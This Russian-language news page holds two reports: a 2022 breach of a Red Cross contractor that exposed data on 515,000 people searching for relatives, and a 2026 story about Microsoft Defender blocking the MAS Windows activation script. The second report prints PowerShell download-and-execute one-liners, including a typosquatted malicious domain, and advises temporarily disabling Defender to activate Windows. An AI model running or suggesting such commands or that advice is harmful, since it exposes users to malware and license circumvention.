Атака затронула Красный Крест и раскрыла ПДн 515 000 человек, ищущих семьи

Екатерина Быстрова 20 Января 2022 - 10:00

Домашние пользователи

Атаки на сайты

Взлом сайтов

Утечки информации

Умышленные утечки информации

Кража данных

...

Атака затронула Красный Крест и раскрыла ПДн 515 000 человек, ищущих семьи

Кибератака на подрядчика международного гуманитарного движения Красного Креста привела к краже персональных данных более 515 тысяч человек, разыскивающих членов своих семей. Инцидент затронул программу «Restoring Family Links», помогающую семьям воссоединиться после войн, катастроф и миграции.

В настоящий момент непонятно, какая именно кибератака поразила подрядчика, однако Международный комитет Красного Креста очень взволнован последствиями для людей, которые уже и так пострадали от пропажи членов семей.

Именно поэтому представители комитета, призывая к человечности, просят киберпреступников не раскрывать, не продавать и не публиковать персональные данные.

«Несмотря на то что мы не знаем, кто именно стоит за этой атакой, мы призываем их не вредить пострадавшим людям. Действия киберпреступников могут привнести в жизни этих людей ещё больше боли и страдания, которых и сейчас вполне достаточно», — заявил Роберт Мардини, генеральный директор Международного комитета Красного Креста.

Работа систем и веб-сайта программы «Restoring Family Links» в настоящее время приостановлена, чтобы у комитета было время провести расследование киберинцидента. Любой простой, по словам представителей Красного Креста, негативно влияет на поиск потерянных членов семей.

К счастью, пока нет оснований полагать, что украденные данные были размещены на площадках дарквеба.

Следующая главная новость »

Подписывайтесь на телеграм-канал AM Live, чтобы всегда быть в курсе самых горячих и свежих новостей. Присоединяйтесь! »

Екатерина Быстрова 09 Января 2026 - 15:02

Windows Microsoft Windows Defender Домашние пользователи Корпорации Защита персональных компьютеров Персональный антивирус Microsoft

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

Оригинальный MAS:
irm https://get.activated.win | iex
Вредоносная подделка:
irm https://get.activate.win | iex
(без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.